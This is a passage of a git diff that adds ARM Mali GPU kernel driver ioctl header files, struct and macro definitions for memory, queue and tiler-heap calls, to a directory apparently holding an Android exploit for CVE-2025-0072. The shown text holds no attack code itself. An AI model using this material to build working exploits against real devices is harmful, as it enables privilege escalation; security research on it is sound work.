buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version upto 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate. + * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cpluscplus +extern "C" { +#endif + +#include +#include + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define 